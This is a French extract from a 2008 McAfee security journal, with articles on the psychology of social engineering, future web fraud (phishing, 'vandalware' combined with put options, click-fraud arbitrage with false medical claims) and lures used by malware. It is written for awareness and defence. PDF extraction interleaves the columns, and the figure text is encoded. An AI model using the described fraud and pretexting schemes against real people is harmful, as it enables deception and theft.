malveillant qui instille la peur : après avoir chiffré des fichiers des vente en ligne lorsqu'il reçoit des e-mails de parrainage d'amis.
utilisateurs, il exige de ces derniers une rançon pour déchiffrer S'il reçoit un message de spam occasionnel qui ressemble
leurs fichiers8. De même, les auteurs d'attaques qui soudoient à une autre invitation d'achat, il risque de dévoiler ses
leurs victimes exploitent leur cupidité, et ceux qui prétendent informations de carte de crédit sur un site web frauduleux.
rechercher de l'aide, leur empathie.
t Biais de confirmation (d'hypothèse) L'individu cherche
Distorsions dans les raccourcis mentaux à collecter des preuves et à interpréter les informations de
façon à confirmer son point de vue13. Prenons un exemple
Les experts en ingénierie sociale font parfois appel à des éléments hypothétique. Supposons que la société Acme conclue avec
extérieurs au registre émotionnel. Ils s'efforcent de saboter Imprimissimo un contrat de maintenance de ses imprimantes, et
nos règles mentales de traitement de l'information, que nous que les membres du personnel de gardiennage d'Imprimissimo
appelons heuristique, ou règles empiriques. portent des chemises grises à longues manches avec des badges
Il faut bien l'admettre : notre heuristique présente certaines nominatifs. Au fil du temps, les employés d'Acme s'habitueront
failles, certes, mais nous ne pouvons pas fonctionner sans elle. à voir les membres du personnel d'Imprimissimo dans leurs
Nos vies seraient trop compliquées si nous devions réfléchir uniformes et identifieront quiconque porte une chemise grise à
longuement à chaque perception, chaque propos, chaque action. longues manches avec un badge comme un gardien. Un intrus
Nous avons désespérément besoin de nos raccourcis mentaux. Le pourrait dont confectionner ou voler un uniforme Imprimissimo
psychologue Robert Cialdini l'explique de la façon suivante9 : afin de se faire passer pour un gardien. En raison du biais de
confirmation qui affecte les employés d'Acme, il est fort possible
que la légitimité de sa présence ne soit pas mise en cause.

10 McAFEE SECURITY JOURNAL


t Effet d'exposition Nous sommes attachés aux choses (et t Effet de saillance Dans un groupe d'individus, le sujet
aux personnes) qui nous sont familières14. Les nouvelles de considéré comme le plus ou le moins influent est celui qui
catastrophes naturelles ou provoquées par l'Homme entraînent se remarque le plus20. L'expert en ingénierie sociale sait
souvent l'émergence de sites web de phishing qui exploitent parfaitement comment s'adapter à la situation et se fondre
ce penchant15. Tous ceux qui aiment suivre l'info de près dans le paysage. Il cherche à faire jouer l'effet de saillance en
pourraient se laisser piéger par des sites de phishing traitant sa faveur. Il peut très bien se présenter comme un client dans
prétendument de l'actualité brûlante. La familiarité avec les un costume d'homme d'affaires ou comme un gardien en
événements évoqués pourraient conduire les internautes uniforme, mais certainement pas comme un jongleur sur des
à baisser leur garde, sans envisager que ces sites sont échasses. Tel un véritable caméléon, il change non seulement
susceptibles d'avoir une nature malveillante. de tenue et d'apparence, mais il adopte le jargon de la
t Ancrage L'individu met l'accent sur un élément identificateur société, s'informe sur ses événements, son personnel et prend
qui leur saute aux yeux lorsqu'il prend des décisions16. Un même l'accent régional. Par exemple, pour s'insinuer dans
logo d'une banque affiché de façon proéminente sur un site une société, un escroc pourrait fort bien avoir appris qu'une
web piraté risque de duper les internautes même si d'autres telle attend un bébé, et que Pierre, Paul ou Jacques est sur le
indicateurs de sécurité révèlent la tromperie17. point de quitter l'entreprise, et échanger ces potins avec le
réceptionniste pour accéder aux bureaux en vue d'y effectuer
Engendrement de schémas erronés une prétendue « maintenance informatique ».
t Conformité, complaisance et obéissance Les pressions
Les psychologues sociaux définissent un « schéma » comme
de conformité, de complaisance et d'obéissance entraînent
une représentation mentale de la réalité sur laquelle nous nous
des changements dans les comportements des individus. De
basons pour tirer des conclusions sur notre environnement.
nombreuses attaques d'ingénierie sociale peuvent s'expliquer
L'on enseigne aux enfants qu'il faut être gentil envers autrui. Le
par les réponses prévisibles des victimes à ces pressions.
tristement célèbre expert en ingénierie sociale Kevin Mitnick a
L'auteur d'une attaque peut par exemple prétendre être une
fait remarquer que les auteurs d'attaques en sont conscients et
directrice en visite et faire pression sur un jeune gardien de
que leurs requêtes « paraissent à tel point raisonnables qu'elles
la sécurité pour qu'il l'autorise à entrer dans les locaux bien
n'éveillent aucun soupçon de la part de la victime, tout en
qu'elle ne porte pas de badge d'accès. (La promesse d'une
sachant exploiter la confiance de cette dernière18 ». Ils exploitent
ainsi abusivement la structure de notre schéma social. récompense ou la menace de sanctions peuvent ajouter à la
pression.) Le gardien peut se sentir désarçonné et céder aux
Quelques exemples de jugements sociaux erronés courants, ainsi instances de la soi-disant directrice. Des attaques d'ingénierie
que la façon dont ils sont exploités par l'ingénierie sociale, sont sociale en groupe n'ont pas été observées, mais on peut
décrits ci-dessous : imaginer qu'elles existent. Afin de pénétrer dans un bureau,
t Erreur d'attribution fondamentale Ce biais consiste par exemple, certains peuvent se faire passer pour des
à penser que les comportements d'autrui reflètent leurs travailleurs légitimes et faire pression tous ensemble auprès
dispositions internes et permanentes19. Il survient lorsque la d'un réceptionniste pour qu'il les laisse entrer, et qu'il « arrête
première impression est trompeuse. Un expert en ingénierie de leur faire perdre du temps ». Le malheureux risque fort
sociale s'efforcera soigneusement de laisser une première de céder, simplement pour éviter de se rendre impopulaire.
impression très positive. L'auteur d'une attaque aura une Une autre technique connue pour être utilisée par les
approche affable lorsqu'il émet une demande ou dominatrice espions consiste à fréquenter la victime pendant quelque
lorsqu'il veut forcer sa victime à faire quelque chose. La temps. En premier lieu, l'auteur de l'attaque demande des
victime potentielle ne se rend pas toujours compte que renseignements innocents à sa proie, puis s'intéresse à des
son interlocuteur joue un rôle, que son comportement est informations sensibles. La victime est prise au piège : elle se
situationnel et que, pour lui, la fin justifie les moyens. sent obligée de se plier aux demandes puisqu'elle a cédé une
première fois, sans quoi elle risque de subir un chantage.

AUTOMNE 2008 11
Conclusion
La structure même de notre cerveau, et plus précisément les On ne peut pas changer la nature humaine. Dès la naissance,
interactions complexes entre les centres de l'émotion et de la nos émotions sont séparées de notre raison, et nous sommes
raison, fait que nous sommes vulnérables à l'ingénierie sociale. donc sujets à commettre des erreurs mentales. Bien que ce
Cette dernière consiste en une manipulation mentale des comportement soit normal, son exploitation par qui sait y faire
sentiments de peur, de curiosité, de cupidité et d'empathie. Le en matière d'ingénierie sociale se révèle dangereuse. Pour mieux
succès des attaques d'ingénierie sociale est dû aux biais cognitifs nous défendre contre ce type d'attaques, il est impératif de bien
et à des schémas sociaux erronés. Mais pourquoi ces informations comprendre la psychologie de l'ingénierie sociale et d'informer
nous sont-elles si précieuses ? correctement les utilisateurs sur ses effets.
Dans l'étude « Computer Crime and Security Survey » (Enquête
sur la sécurité et le crime informatiques) réalisée en 2007 par CSI,
seulement 13 % des répondants ont déclaré qu'ils contrôlaient
Karthik Raman, professionnel certifié en matière de
l'efficacité des formations de leur personnel contre les attaques sécurité des systèmes d'information, est chercheur
d'ingénierie sociale21. Ce pourcentage, certes déjà faible, au sein de McAfee Avert Labs. Ses études portent
n'inclut pourtant pas les répondants qui ne disposent d'aucun notamment sur l'analyse des vulnérabilités, la
programme de formation de ce type. sécurité des réseaux et la sécurité des logiciels. Outre
la sécurité, il s'intéresse également aux sciences
Une première étape évidente consiste à mettre en place des cognitives et sociales, ainsi qu'à la programmation
programmes de sensibilisation des utilisateurs aux dangers de informatique. Parmi ses loisirs, citons le cricket, la
l'ingénierie sociale ainsi que des stratégies de sécurité spécifiques, guitare et l'apprentissage des langues. Karthik Raman
et à améliorer ceux-ci le cas échéant. Toute stratégie relative à est titulaire de licences en sciences informatiques et
en sécurité informatique de la Norwich University
l'ingénierie sociale sera plus persuasive si elle est justifiée par des (Vermont), qu'il a décrochées en 2006.
recherches scientifiques. De même, les formations dispensées
aux utilisateurs seront plus efficaces si elles répertorient les biais
cognitifs généralement exploités dans le cadre de ces attaques
et si elles sont accompagnées de vidéos qui illustrent clairement
comment ces attaques tirent parti de chacun de nos biais cognitifs.

NOTES
1 « Bank loses $1.1M to online fraud » (Une banque perd 1,1 million de dollars lors d'une 13 Nickerson R. S., « Confirmation Bias: A Ubiquitous Phenomenon in Many
fraude en ligne), BBC, 2007 — http://news.bbc.co.uk/2/hi/business/6279561.stm Guises » (Biais de confirmation : un phénomène courant qui prend différentes
2 Schneier B., « The Psychology of Security » (La psychologie de la sécurité), éd. formes), Review of General Psychology, vol. 2, n° 2, 175-220, 1998 —
Essays and Op, 2007 — http://www.schneier.com/essay-155.html http://psy.ucsd.edu/~mckenzie/nickersonConfirmationBias.pdf
3 ibid. 14 Zajonc R. B., « Attitudinal Effects of Mere Exposure » (Effet de simple
4 Asimov, I., « The Human Brain: Its Capacities and Functions » (Le cerveau humain, exposition — Changements attitudinaux), Journal of Personality and Social
ses capacités et fonctions), New York, Mentor Books, 1965 [traduction libre] Psychology, 9, 2, 1-27, 1968
5 Johnson S., « Mind Wide Open: Your Brain and the Neuroscience of Everyday 15 Kaplan D., « Virginia Tech massacre may spawn phishing scams » (De nouvelles
Life » (L'esprit à livre ouvert : cerveau et neuroscience au quotidien), New York, escroqueries par phishing risquent de tirer parti du massacre à l'Université de
Scribner, 2004 [traduction libre] Virginia Tech), SC Magazine, 2007 — http://www.scmagazineuk.com/
6 Svoboda E., « Cultivating curiosity; how to explore the world: Developing a sense Virginia-Tech-massacre-may-spawn-phishing-scams/article/105989/
of wonder can be its own reward » (Cultiver sa curiosité pour explorer le monde : 16 Tversky A., Kahneman D., « Judgment under uncertainty: Heuristics and biases »
la capacité d'émerveillement peut être une récompense en soi), Psychology Today, (Jugement en situation d'incertitude : heuristique et biais), Science, 185, 1124-1130,
2006 — http://psychologytoday.com/articles/index.php?term=pto-4148.html 1974 — http://psiexp.ss.uci.edu/research/teaching/Tversky_Kahneman_1974.pdf
7 Leyden J., « Hackers debut malware loaded USB ruse » (Nouvelle ruse de 17 Dhamija R., Ozment A., Schecter S. « The Emperor's New Security Indicators:
pirates : des clés USB chargées d'un logiciel malveillant), The Register, 2007 — An evaluation of website authentication and the effect of role playing on
http://www.theregister.co.uk/2007/04/25/usb_malware/ usability studies » (Nouveaux indicateurs de sécurité d'Internet : évaluation de
8 Bibliothèque d'informations sur les virus McAfee : GPCoder.i, 9 juin 2008 — l'authentification des sites web et effets d'un jeu de rôle sur les études de facilité
http://vil.nai.com/vil/content/v_145334.htm d'utilisation), 2008 — http://www.usablesecurity.org/emperor/
9 Cialdini R., « Influence: The Psychology of Persuasion » (Influence : la 18 Mitnick K. D., Simon W. L., « The Art of Deception » (L'art de la supercherie),
psychologie de la persuasion), New York, HarperCollins, 1998 [traduction libre] Indianapolis, Wiley Publishing, Inc., 2002 [traduction libre]
10 Heuer R. J., « The Psychology of Intelligence Analysis » (Psychologie de l'analyse 19 Gilbert D. T. et Malone P. S., « The correspondence bias » (Le biais de
des renseignements), Center for the Study of Intelligence, CIA, 2002 — correspondance), Psychological Bulletin, 117, 21–38, 1995 —
http://www.au.af.mil/au/awc/awcgate/psych-intel/art12.html http://www.wjh.harvard.edu/~dtg/Gilbert%20&%20Malone%20
11 Tversky A., Kahneman D., « Judgment under uncertainty: Heuristics and biases » (CORRESPONDENCE%20BIAS).pdf
(Jugement en situation d'incertitude : heuristique et biais), Science, 185, 1124-1130, 20 Taylor S.E. et Fiske S. T., « Point of view and perception so causality » (Point de
1974 — http://psiexp.ss.uci.edu/research/teaching/Tversky_Kahneman_1974.pdf vue, perception et causalité), Journal of Personality and Social Psychology, 32,
12 Mather M., Shafir E. et Johnson, M. K., « Misrememberance of options past: 439-445, 1975
Source monitoring and choice » (Distorsions dans la mémoire des options 21 Computer Security Institute, CSI Computer Crime and Security Survey (Enquête
passées : repérage des sources et choix), Psychological Science, 11, 132-138, sur la sécurité et le crime informatiques), 2007 — http://www.gocsi.com/forms/
2000 — http://www.usc.edu/projects/matherlab/pdfs/Matheretal2000.pdf csi_survey.jhtml (inscription obligatoire)

12 McAFEE SECURITY JOURNAL


L'ingénierie sociale
sur le Web : que nous
réserve l'avenir ?
Markus Jakobsson

Bien que l'ingénierie sociale existe probablement depuis l'aube de la civilisation, les
ravages qu'elle cause aujourd'hui en adaptant ses techniques à Internet suscitent de
nombreuses préoccupations. Cet article traite de l'évolution probable de ce phénomène.

Il est un fait que l'appât du gain est à l'origine de la déferlante Les attaques s'adaptent aux mécanismes de défense
actuelle de logiciels criminels (crimewares). La tendance
d'aujourd'hui manifeste une rupture totale avec le passé. Les Du point de vue des cybercriminels, la fraude sur Internet est une
premiers virus n'étaient autres que l'expression d'une curiosité activité confortable et sans grand danger. En plus de leur garantir
intellectuelle, du désir de compétition et, probablement, d'un des profits juteux et de leur offrir le choix de déterminer l'envergure
certain ennui. Les fraudes aux clics et les attaques par phishing de leur attaque, elle permet également aux malfrats de « travailler »
confirment ce changement : quelle pourrait en être la motivation librement à distance et leur assure une très faible traçabilité, et par
si ce n'est l'appât du gain ? — ces pratiques pouvant être de conséquent des risques fort limités. L'explosion de la cyberfraude n'a
fait fort lucratives. Il en va de même pour les différentes formes donc rien d'étonnant. Mais pour bien comprendre le fonctionnement
de spam. Ce dernier n'existerait pas s'il n'était pas synonyme de ces attaques, il faut d'abord analyser les mécanismes déployés
de rentrées d'argent pour les spammeurs. Il paraît donc logique pour s'en prémunir. Aujourd'hui, la lutte contre la cybercriminalité
d'examiner les différentes façons dont les cybercriminels s'effectue à trois niveaux : par des fonctions techniques (par
exploitent pour leur propre compte les diverses facettes d'Internet exemple, logiciels antivirus, filtres antispam et plugins de navigateur
afin de prévoir les tendances à venir en matière de fraude. antiphishing) ; par des campagnes de sensibilisation telles que
celles du FTC, d'eBay, de SecurityCartoon.com, de banques et
l'initiative CUPS (CMU Usable Privacy and Security) des laboratoires
de Carnegie Mellon University, et enfin par des moyens légaux. Ces
Fraude sur Internet : l'attaque sociotechnique derniers impliquent généralement l'identification de l'origine de la
Les experts sont de plus en plus nombreux à admettre que la fraude, la détection des « drop boxes » (boîtes de dépôt) et, enfin, la
cyberfraude ne se limite plus désormais au domaine technique, traduction en justice des coupables.
mais qu'elle fait de plus en plus appel à l'ingénierie sociale. Le Si le déploiement de moyens techniques et les mesures de
phishing en est l'un des exemples les plus évocateurs, même s'il sensibilisation — lorsqu'ils donnent des résultats tangibles —
n'est pas le seul. De nos jours, les attaques de logiciels criminels amenuisent les profits des criminels, les efforts légaux accroissent
qui recourent aux techniques d'ingénierie sociale sont de plus en les risques. Ces derniers sont considérables, en particulier au vu
plus courantes. Citons par exemple l'arnaque récemment de la croissance effrénée de la fraude sur Internet. Nous avons
perpétrée contre le Better Business Bureau (Bureau d'éthique donc de sérieuses raisons de penser que la cybercriminalité réagira
commerciale), illustrée à la figure 1. Lors de cette attaque par en développant des mécanismes visant à réduire ou à empêcher
phishing, une victime potentielle reçoit un e-mail semblant la traçabilité des attaques. En partant de cette hypothèse, nous
provenir de cet organisme et signalant une réclamation contre chercherons à déterminer les conséquences futures possibles de
l'entreprise du destinataire. La pièce jointe, qui comporte cette tendance. Pour cela, nous envisagerons deux types d'attaques
soi-disant les détails de la réclamation, contient en réalité un très difficilement traçables qui, même si elles n'ont encore jamais
téléchargeur de cheval de Troie. Pire encore, ces e-mails sont eu lieu, ne tarderont sans doute pas à se manifester. Commençons
généralement envoyés à des personnes haut placées dans la par analyser l'importance de l'aspect légal. Nous ferons pour cela
hiérarchie de l'organisation visée, bien souvent des responsables une légère digression afin d'examiner les raisons pour lesquelles les
de la gestion des plaintes émanant des clients. logiciels de demande de rançons (ransomwares) n'ont jamais pris
l'ampleur et produit les effets désastreux que l'on craignait.

AUTOMNE 2008 13
Le fiasco des ransomwares D'après vous, que se passe-t-il si quelqu'un ouvre ou exécute le
fichier joint ? Si l'e-mail ne finit pas dans le dossier de spam et si
A la fin des années 1990, les chercheurs de l'Université de le système antivirus ne le bloque pas, l'ordinateur est infecté ; un
Columbia ont émis l'hypothèse que la nouvelle vague de logiciels ordinateur qui a accès à des données sensibles ou au site web de
malveillants pourraient tenter de réaliser des prises d'otage de l'entreprise. Pire encore, qu'arrive-t-il si ces données sensibles se
données : celles-ci seraient chiffrées au moyen d'une clé publique retrouvent exposées sur Internet, peut-être même sur le site web
véhiculée par un logiciel malveillant, leur « libération » étant de l'entreprise elle-même ? Tohu-bohu général, et dégringolade
conditionnée au paiement d'une rançon contre divulgation de la du cours de l'action ! Le criminel remporte donc son pari : il ne
clé secrète, permettant l'accès aux fichiers chiffrés. Des années plus lui reste plus qu'à réaliser ses options de vente et à encaisser les
tard, le cheval de Troie Archiveus a lancé une attaque semblable, à bénéfices sur l'action en chute libre. En procédant ainsi, l'auteur
la seule différence qu'il mettait en œuvre un chiffrement par clés de l'attaque reste totalement intraçable, puisqu'il se comporte de
symétriques au lieu d'une clé publique. L'attaque a été déjouée la même façon que les autres investisseurs détenant des options
lorsqu'une ingénierie inverse a permis de démanteler le cheval de de vente. Qui est le coupable ? Personne n'est à même de le dire.
Troie et d'extraire la clé de chiffrement/déchiffrement pour ensuite
la distribuer aux victimes. Cependant, l'attaque par Archiveus était Falsification des clics
sans doute vouée à l'échec même si elle avait utilisé un chiffrement
par clé publique (qui, par nature, aurait empêché l'ingénierie La fraude aux clics est un autre type courant de fraude en
inverse de la clé de chiffrement à partir du code, puisque cette clé ligne. Elle exploite le fait que lorsqu'un internaute clique sur
n'aurait jamais été contenue dans le code). La raison de l'échec une annonce, l'annonceur paie une commission au site web
probable n'est pas d'ordre technique, mais financier : en effet, les sur lequel est affichée l'annonce et au portail qui a fourni cette
criminels n'auraient eu aucun moyen de récupérer la rançon en dernière au site web. D'autres types de fraudes similaires tirent
toute sécurité, sans être pistés. parti de campagnes publicitaires qui entraînent un transfert
d'argent dès que l'internaute « voit » une bannière publicitaire
L'offensive des logiciels de cybervandalisme (qu'il effectue ou non une action), ou déclenchent une vente ou
une autre action quand celui-ci voit une annonce. Ces fraudes
Partons de l'exemple des logiciels de demande de rançons ont pour objectif de ponctionner ces transferts d'argent (le
pour examiner un nouveau type d'attaque, celle des logiciels cybercriminel empoche pour chaque annonce affichée sur son
de cybervandalisme (vandalwares). Ce n'est ni l'amusement ni site web) ou de drainer les budgets publicitaires de concurrents
la provocation qui motive ce type de délinquance, mais plutôt (si ces derniers sont les annonceurs qui paient pour les publicités).
l'intérêt financier. Le cybervandale s'y prend en général de la façon Souvent, les escrocs génèrent du trafic de façon automatisée, de
suivante : il commence par choisir l'entreprise qu'il va cibler, puis il sorte que les annonces semblent avoir été réellement visualisées
recourt à des techniques d'exploration de données pour collecter par des internautes. L'automatisation peut avoir recours à
autant d'informations détaillées que possible sur les travailleurs une forme de logiciel malveillant, tel qu'un réseau de robots.
vulnérables. Ces derniers sont ceux qui ont accès aux données Autre approche courante : les malfaiteurs peuvent recruter des
sensibles ou aux pages qui constituent la « devanture » du site « cliqueurs à gage » qui activeront des annonces sélectionnées.
web de l'entreprise. L'employé vulnérable constitue pour les
vandales du Web une source précieuse d'informations, notamment
sur la structure interne de l'entreprise, les noms des personnes Réclamation auprès du BBB
occupant des postes importants et le format des adresses e-mail.
Ensuite, l'escroc achète des options de vente de l'entreprise (s'il BBB CASE #569822971
s'agit d'une société cotée en bourse). Une option de vente est
&RPSODLQW¿OHGE\ 0LFKDHO7D\ORU
un instrument financier dont la valeur augmente si le cours de %XVLQHVV1DPH
l'action correspondante chute : elle permet aux investisseurs et &RPSODLQW¿OHGDJDLQVW &RQWDFW
%%%0HPEHU
spéculateurs d'engranger des bénéfices dans la mesure où un titre
&RPSODLQWVWDWXV 
est sur le point de perdre de la valeur. Il est fort probable qu'en
&DWHJRU\ &RQWUDFW,VVXHV
plus du criminel, d'autres investisseurs acquièrent également &DVHRSHQHGGDWH 
des options de vente, en particulier si l'action de l'entreprise &DVHFORVHGGDWH 
ciblée présente un volume de transactions raisonnable. Enfin,
$WWDFKHG\RXZLOO¿QGDFRS\RIWKHFRPSODLQW3OHDVHGRZQORDGDQG
le cybervandale lance l'attaque contre la société, en général NHHSWKLVFRS\VR\RXFDQSULQWLWIRU\RXUUHFRUGV
en envoyant à quelques travailleurs sélectionnés des e-mails 2Q)HEUXDU\WKHFRQVXPHUSURYLGHGWKHIROORZLQJLQIRUPDWLRQ
falsifiés semblant provenir d'un autre membre du personnel, 7KHFRQVXPHULQGLFDWHGKHVKH','127UHFHLYHGDQ\UHVSRQVHIURPWKH
EXVLQHVV
leur supérieur par exemple : « Bonjour Jacques, Pouvez-vous
7KHIRUP\RXXVHGWRUHJLVWHUWKLVFRPSODLQWLVGHVLJQHGWRLPSURYHSXEOLF
examiner la présentation PowerPoint en pièce jointe et me dire DFFHVVWRWKH%HWWHU%XVLQHVV%XUHDXRI&RQVXPHU3URWHFWLRQ&RQVXPHU
ce que vous en pensez ? Merci de bien vouloir me faire un bref 5HVSRQVH&HQWHUDQGLVYROXQWDU\7KURXJKWKLVIRUPFRQVXPHUVPD\
HOHFWURQLFDOO\UHJLVWHUDFRPSODLQWZLWKWKH%%%8QGHUWKH3DSHUZRUN
rapport sur la question pour demain matin. Je compte sur vous. » 5HGXFWLRQ$FWDVDPHQGHGDQDJHQF\PD\FRQGXFWRUVSRQVRUDQGD
SHUVRQLVQRWUHTXLUHGWRUHVSRQGWRDFROOHFWLRQRILQIRUPDWLRQXQOHVVLW
Ou le soi-disant expéditeur peut être un administrateur système : GLVSOD\VDFXUUHQWO\YDOLG20%FRQWUROQXPEHU7KDWQXPEHULV
« Un nouveau virus informatique dangereux a été détecté, et nos ‹%%%RUJ$OO5LJKWV5HVHUYHG
systèmes ne sont pas équipés des correctifs adéquats pour nous en &RPSODLQWBGRF!
protéger. Veuillez installer immédiatement le programme ci-joint
sur votre ordinateur pour assurer notre sécurité. Effectuez cette Figure 1 : Escroquerie contre le Better Business Bureau. L'e-mail contient une pièce jointe
procédure le plus vite possible. » infectée, l'auteur de l'attaque espérant que celle-ci sera ouverte par le destinataire.

14 McAFEE SECURITY JOURNAL


Examinons à présent la façon dont l'ingénierie sociale peut être (asthme) au prix de 0,10 dollar pour générer du trafic vers son site.
mise en œuvre dans le cadre d'une nouvelle attaque de type fraude Dès que le nombre de visiteurs arrivant sur son site après avoir
aux clics. (Précisons d'ailleurs à cette occasion que nous conservons cliqué sur l'annonce correspondant au mot clé « mesothelioma »
les mots clés en anglais et les valeurs en dollars, puisque les atteint le nombre de 634, il réalise un bénéfice. Mais comment ces
exemples cités ne sont valables que pour le marché américain et la visiteurs sont-ils amenés à cliquer sur l'annonce ? Supposons que
langue anglaise.) Penchons-nous d'abord sur un premier scénario le site web contienne simplement un article soi-disant rédigé par
courant qui ne constitue pas une fraude aux clics : un médecin et dont le sujet est « Saviez-vous que 10 pour cent
des asthmatiques risquent de contracter un mésothéliome ? ».
t Scénario 1 Site web standard. Imaginons un site web légitime
Même si cette affirmation est mensongère, de nombreuses
qui fournit un service et affiche des annonces liées à ce service.
personnes concernées par l'asthme et qui ne savent pas
Le contenu des annonces est généralement déterminé de
exactement ce qu'est un mésothéliome feront exactement ce que
façon automatique par les portails d'annonces (tels que Google
veut l'escroc, à savoir cliquer sur l'annonce. Supposons qu'un
et Yahoo), au travers de l'examen automatique du contenu du
visiteur sur deux se laisse prendre au piège. Si le site compte mille
site web et de la sélection d'annonces sur des thèmes associés
visiteurs par jour, le cybercriminel engrangera chaque jour un petit
à ce contenu. Ainsi, un site web culinaire comportera des
magot de plus de 30 000 dollars. Et même avec des mots clés
annonces sur des machines à café, des casseroles et autres
moins évidents, ses gains seront plus qu'appréciables.
ustensiles de cuisine. En général, les annonces de ces sites sont
destinées à générer du trafic et utilisent par conséquent des
Ces trois scénarios diffèrent par leur intention et par leur emploi
mots clés comme « couteau », « calphalon », « teflon » et
de l'ingénierie sociale. Du point de vue du fournisseur d'annonces,
d'autres termes similaires. Ce type de site n'a rien d'inhabituel.
néanmoins, ils sont très similaires dans leur structure. Le visiteur arrive
t Scénario 2 Arbitrage. Prenons à présent un site web sur le site, lit son contenu et clique sur une annonce. Bien qu'il soit
comportant du contenu qui sélectionne des annonces possible de mettre en corrélation les mots clés entrants et sortants
correspondant aux mots clés « find a attorney », qui signifie pour détecter les anomalies, les malfaiteurs peuvent faire appel à
« rechercher un avocat ». (L'utilisation de l'article « a » plutôt deux fournisseurs de services différents pour générer respectivement
que « an », qui serait l'option grammaticalement correcte, n'est le trafic entrant et le trafic sortant. Cette stratégie rend difficile la
pas un hasard. Les raisons de ce choix vous sont expliquées détection et le blocage de ce type d'attaque, en particulier si elle est
plus loin.) La sélection des annonces est possible grâce à la réalisée à petite échelle, mais sur un grand nombre de sites.
présence dans le site d'une grande quantité de texte (visible ou
non) où cette expression se répète. Au moment de la rédaction Conclusion
de cet article, le coût d'une stratégie de ce genre oscillait entre
1,07 et 7,05 dollars. Le prix exact dépend de la localisation et L'ingénierie sociale sur Internet est désormais solidement et
de la langue du site, de l'heure du jour et, bien entendu, des durablement ancrée. Nous avons déjà pu mesurer l'ampleur de
offres concurrentes soumises pour ces mots clés car les valeurs ses effets dévastateurs lorsqu'elle est appliquée aux arnaques par
des mots clés sont établies suivant un système d'enchères. Par phishing. Elle commence en outre à être exploitée pour améliorer
conséquent, si un utilisateur clique sur une annonce de ce site, l'efficacité du spam et des logiciels criminels. Dans un avenir
le propriétaire de l'annonce paiera le montant correspondant proche, il faudra malheureusement s'attendre aussi à la progression
au portail, qui à son tour devra transférer le montant (moins la de certaines applications de l'ingénierie sociale exigeant des
commission) au site web sur lequel l'annonce est affichée. compétences plus pointues à des fins frauduleuses, par exemple
la fraude aux clics. Nous pouvons concevoir des contre-mesures
Imaginons maintenant que ce site place une annonce utilisant techniques qui prennent en compte cette tendance. De plus, une
les mots clés « find an attorney », qui signifie également meilleure compréhension des diverses formes possibles d'attaques
« rechercher un avocat ». La seule différence par rapport nous aidera à améliorer les mécanismes de défense mis en œuvre.
à l'exemple précédent réside dans l'utilisation de l'article Toutefois, il nous faut également être conscient du fait que notre
« an » au lieu de « a » : cette combinaison de mots clés, plus stratégie nécessite des interfaces utilisateur améliorées, des
courante, présente une fourchette de prix inférieure, qui varie procédures plus rigoureuses, une réglementation plus stricte ainsi
entre 0,87 et 3,82 dollars. Nous supposerons que le site web qu'une plus grande sensibilisation. En tant qu'experts en sécurité,
paie 2 dollars pour chaque visiteur qu'il amène et en reçoit la route est encore longue.
4 pour chaque visiteur qui clique sur une annonce du site.
Dans la mesure où 50 % des visiteurs qui arrivent via l'annonce
à 2 dollars cliquent sur une annonce à 4 dollars, le site réalise
un bénéfice sans fournir aucun service. C'est ce que l'on Markus Jakobsson est chercheur au Palo Alto
appelle « arbitrage de mots clés ». Et comme nous allons le Research Center. Ses études portent sur le phishing
constater, cette approche frise la fraude aux clics même si elle et les contre-mesures, la fraude aux clics, l'influence
n'en constitue pas véritablement une. du facteur humain sur la sécurité, la cryptographie,
la sécurité des réseaux et la conception des
t Scénario 3 Attaque par ingénierie sociale. Voyons à présent
comment un escroc peut appliquer l'ingénierie sociale à la protocoles. Il est corédacteur de l'ouvrage Phishing
technique d'arbitrage afin d'amasser une petite fortune. and Countermeasures (Phishing et contre-mesures),
Supposons qu'il mette sur pied un site web qui génère le mot clé publié aux éditions Wiley en 2006, et co-auteur de
« mesothelioma » (mésothéliome), une forme rare de cancer Crimeware : Understanding New Attacks and Defenses
causée par l'exposition à l'amiante. Au moment de la rédaction de (Logiciels criminels : nouvelles attaques et menaces),
cet article, la valeur du mot clé « mesothelioma » sur Google était publié aux éditions Symantec Press en 2008.
Image fournie gracieusement par PARC, photographe : Brian Tramontana
de 63,42 dollars. L'escroc achète en outre le mot clé « asthma »

AUTOMNE 2008 15
Une cible de choix
pour les logiciels
d'ingénierie sociale
Elodie Grandjean

Les auteurs de logiciels malveillants ont souvent recours à des techniques


d'ingénierie sociale pour infecter directement un système ou un hôte, ou pour
lancer le téléchargement et l'exécution en cascade de logiciels malveillants.

La plupart d'entre nous ont déjà reçu un e-mail concernant une t Faux e-mails émanant de banques, de services de paiement
importante mise à jour de sécurité ou un message émanant en ligne et d'autres services financiers qui demandent une
d'une ancienne connaissance désireuse de renouer le contact, qui confirmation ou une mise à jour des références de connexion
contenaient en réalité une pièce jointe ou une URL malveillante. ou des informations de carte de crédit
t E-mails de menace, mentionnant des peines d'emprisonnement
Ne croyez pas que les e-mails constituent le seul vecteur de
ou des appels à des fonctions de juré
propagation des logiciels malveillants à l'aide des techniques
d'ingénierie sociale. Il existe une pléthore d'autres ruses, t Jeux et économiseurs d'écran gratuits contenant un cheval de
recourant notamment aux très populaires services de messagerie Troie ou des outils antispyware gratuits, souvent eux-mêmes
instantanée. Si son système a été compromis, un ami peut vous des programmes malveillants
envoyer un message dans lequel il vous invite à regarder des t Evénements majeurs, tels que compétitions sportives,
photos, accompagné d'une URL pointant vers un fichier. Vous catastrophes climatiques ou actualité brûlante
faites naturellement confiance au contact sans savoir que son
système est infecté. Et dans de nombreux cas, l'URL vous redirige t Mention de célébrités et potins les concernant
vers un logiciel malveillant. t Relations secrètes ou considérées comme fiables, notamment
l'abonnement à des sites de réseau social, faux amis, anciens
D'autres logiciels malveillants font appel à l'ingénierie sociale camarades de classe, membres de la famille et amants secrets
pour s'emparer d'informations confidentielles, dont les références
de connexion, les numéros de carte de crédit, etc. Ces techniques La liste des sujets potentiels est pratiquement illimitée, et tous
sont généralement utilisées dans le cadre d'attaques par phishing sont très attirants pour un grand nombre d'utilisateurs aux quatre
ou d'intrusions sur les serveurs. coins du monde. A la lumière de la liste, on constate également
que l'ingénierie sociale peut souvent prendre pour cible des
Parmi les sujets évoqués par les spécialistes de l'ingénierie sociale groupes d'utilisateurs au niveau local ou national. Ainsi, une
pour appâter leurs victimes, les plus souvent utilisés sont les attaque d'envergure mondiale lancée contre un site de réseau
services « pour adultes ». En voici quelques autres, étant entendu social connu touchera un public international. En revanche, une
que la liste est loin d'être exhaustive : attaque similaire concernant l'élection présidentielle américaine
t Liens et images pornographiques fera des victimes majoritairement américaines.

t Utilisation d'un nom de femme dans le champ de l'expéditeur


